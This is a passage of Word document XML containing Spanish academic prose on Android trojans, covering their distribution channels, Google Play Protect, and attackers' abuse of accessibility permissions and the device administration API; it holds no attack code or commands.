        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por otro lado, existen troyanos dentro de aplicaciones que simulan ser benignas sin suplantar a otras existentes, como pueden ser utilidades de sistema o plataformas de juegos que cuentan con funcionalidades legítimas en algunos casos, pero que siempre contienen componentes maliciosos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0FA96B" w14:textId="3F771542" w:rsidR="00450284" w:rsidRDefault="00450284" w:rsidP="00C0328A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Al </w:t>
      </w:r>
      <w:r w:rsidR="007D33EA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>basarse Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D33EA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>en un sistema aplicaciones y siendo gran parte de ellas ajenas al sistema original que se instala en el dispositivo, los troyanos se adaptan perfectamente a este modelo y son una de las tipologías de malware más eficaces y con mayor capacidad lucrativa para los grupos de atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AE26BD" w14:textId="77777777" w:rsidR="00AF59A4" w:rsidRDefault="00AF59A4" w:rsidP="0020250F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A55626E" w14:textId="77777777" w:rsidR="007D33EA" w:rsidRDefault="007D33EA" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41601978" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4716">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Métodos de distribución</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C5A63" w14:textId="77777777" w:rsidR="003D3D77" w:rsidRPr="00BB4716" w:rsidRDefault="003D3D77" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B2FB51" w14:textId="77777777" w:rsidR="00EA14DE" w:rsidRDefault="001D692F" w:rsidP="003D3D77">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Uno de los factores importantes a tener en cuenta en los troyanos en Android es el canal de distribución. Los atacantes tratan de minimizar el nivel de sospecha por parte de los usuarios para facilitar la instalación de las aplicaciones maliciosas, y para ello utilizan diferentes mecanismos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7C2F7B" w14:textId="77777777" w:rsidR="006D7E50" w:rsidRDefault="001D692F" w:rsidP="003D3D77">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El primero de ellos y uno que aumenta la credibilidad del troyano es su distribución directa mediante canales oficiales de aplicaciones. El principal de estos canales es la Play Store de Google, que cuenta en la actualidad con más de 3 millones de aplicaciones para el sistema Android. En el sistema Android por defecto, esta es la única tienda de aplicaciones disponible, aunque algunos fabricantes utilizan también plataformas propias para la distribución de aplicaciones, como es el caso de Samsung con su Galaxy Store o la Appstore de los dispositivos Amazon. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C36C0" w14:textId="7D202E7B" w:rsidR="007D33EA" w:rsidRDefault="001D692F" w:rsidP="003D3D77">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Además, existen canales de distribución alternativos no asociados a los fabricantes, pero que también cuentan con un gran volumen de usuarios debido a las características </w:t>
      </w:r>
      <w:r w:rsidR="002C76D4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">particulares </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que ofrecen, como por ejemplo F-Droid</w:t>
      </w:r>
      <w:r w:rsidR="008C46CD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00046A62">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[X]</w:t>
      </w:r>
      <w:r w:rsidR="008C46CD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, que distribuye únicamente aplicaciones de código abierto o Aptoide</w:t>
      </w:r>
      <w:r w:rsidR="008C46CD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F36E60">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[X]</w:t>
      </w:r>
      <w:r w:rsidR="008C46CD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B60B69">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">un mercado </w:t>
      </w:r>
      <w:r w:rsidR="00752612">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">secundario </w:t>
      </w:r>
      <w:r w:rsidR="00B60B69">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">popular debido a que </w:t>
      </w:r>
      <w:r w:rsidR="00B86AFE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>almacena y permite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la descarga de aplicaciones que originalmente son de pago </w:t>
      </w:r>
      <w:r w:rsidR="00B86AFE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de manera gratuita</w:t>
      </w:r>
      <w:r w:rsidR="00B60B69">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B86AFE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y también facilita la descarga de versiones específicas de aplicaciones que ya no están disponibles a través de los canales oficiales debido a su antigüedad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC51044" w14:textId="0E9FF5C0" w:rsidR="001D692F" w:rsidRDefault="001D692F" w:rsidP="003D3D77">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Asimismo, una de las opciones del sistema Android es la instalación de aplicaciones directamente por parte de los usuarios </w:t>
      </w:r>
      <w:r w:rsidR="00EF68E1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>si estos cuentan con el archivo APK</w:t>
      </w:r>
      <w:r w:rsidR="00B86AFE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y lo transfieren al dispositivo</w:t>
      </w:r>
      <w:r w:rsidR="00EF68E1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Pese a que por defecto </w:t>
      </w:r>
      <w:r w:rsidR="005971DB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la seguridad d</w:t>
      </w:r>
      <w:r w:rsidR="00EF68E1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el sistema previene la instalación de aplicaciones que provienen de fuentes desconocidas, esta prevención puede ser desactivada por los usuarios de manera sencilla en los ajustes del sistema. Esto supone un vector adicional de entrada de aplicaciones al sistema, y en este caso se cuenta con un nivel de protecciones bajo relativo a las otras opciones de distribución mencionadas previamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB78A91" w14:textId="7F42309B" w:rsidR="00AC321B" w:rsidRDefault="00AC321B" w:rsidP="003D3D77">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Por defecto, la tienda Play Store de Google y los mercados de los fabricantes mayoritarios cuentan con comprobaciones y análisis que son efectuados en las aplicaciones previa a su publicación en el catálogo del mercado. </w:t>
      </w:r>
      <w:r w:rsidR="00D023B3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Esto minimiza la cantidad de aplicaciones maliciosas que logran la publicación, pero sigue siendo una cantidad importante de ellas la que logra pasar las barreras y establecerse en los mercados oficiales, con millones de descargas por parte de usuarios </w:t>
      </w:r>
      <w:r w:rsidR="00327FC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[X].</w:t>
      </w:r>
      <w:r w:rsidR="00D023B3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F083A2E" w14:textId="41EDB097" w:rsidR="00D023B3" w:rsidRDefault="00D023B3" w:rsidP="003D3D77">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Además, Google cuenta con funcionalidades de seguridad adicionales en el caso de que la aplicación </w:t>
      </w:r>
      <w:r w:rsidR="00FC3604">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ya </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se encuentre instalada en el sistema. Con el objetivo de identificar PHAs (término de Google para englobar aplicaciones</w:t>
      </w:r>
      <w:r w:rsidR="008134F6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que pueden provocar daños al dispositivo o sus datos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que proviene del inglés Potentially Harmful Applications </w:t>
      </w:r>
      <w:r w:rsidR="008E36DB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">) Google ha desarrollado el sistema Google Play Protect, que realiza escaneos diarios de todas las aplicaciones presentes en </w:t>
      </w:r>
      <w:r w:rsidR="008134F6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> dispositivo, además de intentar prevenir instalaciones de aplicaciones externas a Google Play si estas son detectadas como maliciosas en función de las muestras </w:t>
      </w:r>
      <w:r w:rsidR="008134F6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">dañinas de las </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que poseen</w:t>
      </w:r>
      <w:r w:rsidR="008134F6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> información previa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Como medidas adicionales, este servicio Play Protect permite a los usuarios la petición de escaneos</w:t>
      </w:r>
      <w:r w:rsidR="008134F6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> suplementarios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y también </w:t>
      </w:r>
      <w:r w:rsidR="008134F6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tiene un modo de funcionamiento que permite los escaneos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> cuando el dispositivo carece de conexión</w:t>
      </w:r>
      <w:r w:rsidR="00E71C28">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA3D253" w14:textId="4FE32DB7" w:rsidR="00D023B3" w:rsidRDefault="00D023B3" w:rsidP="003D3D77">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En definitiva, Google (y en menor medida otros de los </w:t>
      </w:r>
      <w:r w:rsidR="00A467BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">principales </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fabricantes) cuentan con numerosos sistemas de prevención y defensa para tratar de combatir a las aplicaciones maliciosas. No obstante, esto no impide que sigan apareciendo casos en los que los atacantes son capaces de sobrepasarlas y cumplir sus objetivos maliciosos, bien a través de canales oficiales, bien mediante el tráfico de APKs en mercados secundarios.</w:t>
      </w:r>
      <w:r w:rsidR="002E57A7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Además, las medidas de seguridad no cubren todos los casos, ya que algunas funcionalidades, como es el caso de los permisos de accesibilidad</w:t>
      </w:r>
      <w:r w:rsidR="00412CA2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se verán en detalle a continuación, quedan fuera de las pruebas y comprobaciones de seguridad realizadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0117B1E1" w14:textId="77777777" w:rsidR="00AF59A4" w:rsidRDefault="00AF59A4" w:rsidP="00AA7068">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A6235D" w14:textId="77777777" w:rsidR="00DA5D0A" w:rsidRDefault="00DA5D0A" w:rsidP="00AA7068">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EBDE557" w14:textId="52CAA79F" w:rsidR="00E95A92" w:rsidRDefault="00221EB3" w:rsidP="00AA7068">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E4082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sistema</w:t>
      </w:r>
      <w:r w:rsidR="00E95A92" w:rsidRPr="003E4082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de permisos de accesibilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA7202" w14:textId="77777777" w:rsidR="00774CD1" w:rsidRPr="003E4082" w:rsidRDefault="00774CD1" w:rsidP="00AA7068">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB7DF2E" w14:textId="247BD63B" w:rsidR="00B97E4D" w:rsidRDefault="00B97E4D" w:rsidP="00774CD1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El abuso de los permisos es uno de los vectores de ataque más comunes por parte de aplicaciones Android, contando muchas veces con la colaboración del usuario, que desconoce qué permisos está realmente otorgando o no presta demasiada atención al proceso inicial al instalar una aplicación. Debido a esto, Android cuenta desde su versión 12 con medidas adicionales de notificación para tratar de alertar a los usuarios en casos como la activación de la cámara o el micrófono del dispositivo, conocidas como “Privacy indicators”</w:t>
      </w:r>
      <w:r w:rsidR="008C46CD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E7E45">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Por esto, algunos de los desarrolladores de aplicaciones maliciosas han modificado sus mecanismos de acceso a estos recursos, haciendo uso de otro tipo de permisos que otorga el sistema con la esperanza de que no alerten al usuario de manera tan repentina y este acepte los permisos sin </w:t>
      </w:r>
      <w:r w:rsidR="00A57037">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>levantar sospechas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EAF1F8" w14:textId="24FFE3B3" w:rsidR="003C5753" w:rsidRDefault="00B97E4D" w:rsidP="00774CD1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Algunos de estos permisos son relativos a la </w:t>
      </w:r>
      <w:r w:rsidR="003C5753">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>accesibilidad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B756BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la herramienta de los sistemas operativos móviles </w:t>
      </w:r>
      <w:r w:rsidR="00D275A8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(y sistemas informáticos en general) </w:t>
      </w:r>
      <w:r w:rsidR="00CF5627">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con la finalidad </w:t>
      </w:r>
      <w:r w:rsidR="00B756BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="009F5E43">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>facilitar y hacer lo más práctica posible</w:t>
      </w:r>
      <w:r w:rsidR="00B756BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la experiencia de uso para las personas con discapacidades visuales, auditivas, cognitivas o físicas. En el caso de Android, las primeras opciones de accesibilidad fueron introducidas en su versión 1.6 (conocida popularmente como Donut) y se centraron en </w:t>
      </w:r>
      <w:r w:rsidR="009F5E43">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r w:rsidR="00B756BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> lector de pantalla TalkBack</w:t>
      </w:r>
      <w:r w:rsidR="007E66B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, con nuevas características </w:t>
      </w:r>
      <w:r w:rsidR="006D2A04">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">surgiendo en versiones posteriores del sistema, </w:t>
      </w:r>
      <w:r w:rsidR="007E66B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">como </w:t>
      </w:r>
      <w:r w:rsidR="006D2A04">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la </w:t>
      </w:r>
      <w:r w:rsidR="007E66B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">navegación por gestos, </w:t>
      </w:r>
      <w:r w:rsidR="006D2A04">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el </w:t>
      </w:r>
      <w:r w:rsidR="007E66B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">control del dispositivo por voz mediante </w:t>
      </w:r>
      <w:r w:rsidR="00C54230">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el sistema </w:t>
      </w:r>
      <w:r w:rsidR="007E66B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Voice Access, </w:t>
      </w:r>
      <w:r w:rsidR="006D2A04">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la </w:t>
      </w:r>
      <w:r w:rsidR="007E66B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">generación automática de subtítulos o </w:t>
      </w:r>
      <w:r w:rsidR="006D2A04">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la </w:t>
      </w:r>
      <w:r w:rsidR="007E66B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>conexión con audífonos o implantes cocleares, además de contar con Android Accesibility Suite</w:t>
      </w:r>
      <w:r w:rsidR="00C860DD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r w:rsidR="007E66B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que reúne </w:t>
      </w:r>
      <w:r w:rsidR="006D2A04">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la gestión de </w:t>
      </w:r>
      <w:r w:rsidR="007E66B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>varios de estos servicios en una única aplicación oficial de</w:t>
      </w:r>
      <w:r w:rsidR="006D2A04">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Google</w:t>
      </w:r>
      <w:r w:rsidR="007E66B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F885E9" w14:textId="77777777" w:rsidR="00AD5295" w:rsidRDefault="00AD5295" w:rsidP="00774CD1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DDC6277" w14:textId="7286EEE4" w:rsidR="007E66B7" w:rsidRDefault="00AD5295" w:rsidP="00774CD1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Otro de los mecanismos que los atacantes utilizan en algunos casos es el sistema de administración de dispositivo.</w:t>
      </w:r>
      <w:r w:rsidR="003B317E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Este sistema es una API que Android proporciona desde su versión 2.2 (conocida como Froyo)</w:t>
      </w:r>
      <w:r w:rsidR="007C4E8D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r w:rsidR="008B5400">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B317E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y que permite a los desarrolladores de aplicaciones manejar a través de estas la gestión de ciertos servicios del dispositivo que por lo general se encuentran fuera del sistema habitual de permisos. </w:t>
      </w:r>
      <w:r w:rsidR="008B5400">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta funcionalidad está diseñada principalmente para entornos de empresa en los que se busca facilitar la gestión de numerosos dispositivos empresariales de manera controlada y segura, permitiendo la instalación de aplicaciones y el control sobre las políticas de bloqueo de pantalla entre otros. La lista de permisos que otorga este rol de administrador a través de la API varía en función de los requeridos por la aplicación que cuenta con el rol. Por lo tanto, pese a que esta característica puede resultar útil en ciertos casos, también puede ser abusada para tratar de obtener mayores privilegios bajo el pretexto del control seguro del dispositivo. No obstante, para que una aplicación sea asignada como administradora del dispositivo, el usuario ha de aceptar los términos, por lo </w:t>
      </w:r>
      <w:r w:rsidR="001C171C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tanto,</w:t>
      </w:r>
      <w:r w:rsidR="008B5400">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> nuevamente es la falta de atención o el desconocimiento de los usuarios que abre la puerta a la entrada del malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D08FA" w14:textId="77777777" w:rsidR="00B756BD" w:rsidRDefault="00B756BD" w:rsidP="00AA7068">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F3F006" w14:textId="77777777" w:rsidR="00B756BD" w:rsidRDefault="00B756BD" w:rsidP="00AA7068">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4FEF02" w14:textId="7333398D" w:rsidR="00B756BD" w:rsidRDefault="00B756BD" w:rsidP="00AA7068">
      <w:pPr>
        <w:jc w:val="both"/>
